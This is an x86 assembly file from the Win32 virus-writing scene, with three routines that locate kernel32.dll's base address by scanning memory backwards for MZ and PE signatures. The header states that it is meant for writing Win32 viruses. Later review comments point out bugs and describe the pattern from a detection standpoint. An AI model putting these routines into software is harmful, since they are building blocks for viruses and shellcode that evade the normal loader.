;----------------------------------------------------------------------------------
; Retrieve Kernel32.dll Address
; -------------------------------
;
;
;This is the example asm code to retrieve the Kernel32.dll address from the memory.
;It is useful when you code the Win32 virus, :p
;
;
;The code is simple and straighforward, so, it should be easy enough to follow
;
;
;Credit go to Lord Julus, Billy Belcebu.
;Thanks go to F-13 Labs
;
;
; Disclaimer
; ----------
;THIS CODE IS MEANT FOR EDUCATIONAL PURPOSES ONLY. THE AUTHOR CANNOT BE HELD
;RESPONSIBLE FOR ANY DAMAGE CAUSED DUE TO USE, MISUSE OR INABILITY TO USE THE
;SAME
;
;
;Author : lclee_vx
;Group  : F-13 Labs
;Web    : http://f13.host.sk
;Email  : lclee_vx@yahoo.com
;
;
; NOTE(review): syntax is MASM-style, 32-bit, for the Win32 process environment.
; All three variants below rely on two things the code itself never verifies:
;   1. that the value found at [esp] on entry points into the kernel32 image
;      (the caller is expected to load it into esi — "begin [esp]" below), and
;   2. that every address they read is mapped.  None of the routines installs
;      an exception handler, so a compare against an unmapped page terminates
;      the scan with an access violation rather than a clean failure.
; From a forensic / detection point of view the telling pattern is the same in
; every variant: walk memory backwards from a stack-derived pointer, testing
; for the "MZ" and "PE" signatures — a way of locating a module base that
; bypasses the normal loader/import path.
;
;
; a. Example 1
;-------------------------------------
;Input  : esi = begin [esp]
;Output : esi = Kernel base
;-------------------------------------
; Walks DOWN one byte at a time.  Candidate test at each step:
;   - word at [esi+3ch]  (the e_lfanew slot of a DOS header) must be < 1000h
;   - dword at [esi + e_lfanew + 34h] (ImageBase field of the PE optional
;     header) must equal esi itself
; Only eax is preserved (push/pop); esi is the return value; flags are clobbered.
GetK32 proc
        push    eax
Step1:
        dec     esi                     ; step back one byte; no lower bound —
                                        ; keeps going until it faults or matches
        mov     ax, [esi+3ch]           ;ax=PE header offset
                                        ; NOTE(review): only the low 16 bits of
                                        ; eax are written here; bits 16-31 keep
                                        ; whatever the caller left in eax, and
                                        ; they take part in the [esi+eax+34h]
                                        ; address below — result depends on the
                                        ; caller's eax, not just on the header.
        test    ax, 0f000h              ; ax = 0000 xxxx xxxx xxxx
                                        ; AND
                                        ; f000h = 1111 0000 0000 0000
                                        ; zero? = 0000 0000 0000 0000
                                        ;
                                        ;so, value ax < 1000h (4096d byte / 1 page)
                                        ;
        jnz     Step1                   ; offset too large for a real header; keep scanning
        cmp     esi, [esi+eax+34h]      ; does OptionalHeader.ImageBase == esi ?
        jnz     Step1                   ; no — keep scanning (reads [esi+eax+34h] unchecked)
        pop     eax
        ret
GetK32 endp

; -----------------------------------------
; b. Example2
;----------------------------------------------------
;Input  : esi= begin [esp]
;Output : eax= kernel base
;----------------------------------------------------
; Walks DOWN one page (1000h) at a time, at most Limit pages.  A page whose
; first word is "MZ" is then checked for "PE\0\0" at its e_lfanew offset.
; On success: eax = base, CF clear (left by the successful cmp).
; On failure: CF set (stc), eax = last address scanned (falls through into
; WeGotK32).  Clobbers edi, esi, flags.
; NOTE(review): ebp is used as a base for the K32_Limit data but is never set
; here — presumably a relocation delta computed by the caller; confirm.
Limit   equ (50000h/1000h)              ; 50h = 80 pages of search range
.code
GetK32:
__1:
        cmp     byte ptr [ebp+K32_Limit],00h    ; pages left to try?
        jz      WeFailed
        cmp     word ptr [esi],"ZM"     ; "ZM" as a word == "MZ" in memory (little-endian)
        jz      CheckPE
__2:
        sub     esi,1000h               ; previous page
        dec     byte ptr [ebp+K32_Limit]        ; NOTE(review): this is a write into
                                        ; the .code section; it only works while
                                        ; that section is writable (fails under W^X)
        jmp     __1
CheckPE:
        mov     edi,[esi+3Ch]           ; e_lfanew
        add     edi,esi                 ; edi = address of the NT headers
        cmp     dword ptr [edi],"EP"    ; "EP" as a dword == "PE\0\0" in memory
        jz      WeGotK32
        jmp     __2
WeFailed:
        stc                             ; CF = 1 signals failure to the caller
WeGotK32:
        xchg    eax,esi                 ; eax = base (or last page on failure)
        ret
K32_Limit dw limit                      ; NOTE(review): declared as a word but
                                        ; read/decremented as a byte above;
                                        ; consistent only while Limit <= 0ffh
;-------------------------------------------------------------

; c. Example 3
;-------------------------------------
;Input  : esi= begin [esp]
;Output : eax= kernel base
;-------------------------------------
; Minimal variant: walks DOWN one page at a time until the first "MZ" word.
; No page limit, no "PE" check, no failure path — any module header (or a
; stray "MZ" pattern) in the search path is accepted as the result, and an
; unmapped page faults.  Clobbers esi, flags.
; NOTE(review): the quote characters on the cmp line below are typographic
; (“ ”), not ASCII " — as printed, the assembler will reject that line.
GetK32 proc
ScanK32:
        cmp     word ptr [esi], “ZM”    ; "MZ" at the current candidate?
        je      K32Found
        sub     esi, 1000h              ; previous page
        jmp     ScanK32
K32Found:
        mov     eax, esi
        ret
GetK32 endp
;------------------------------------------------------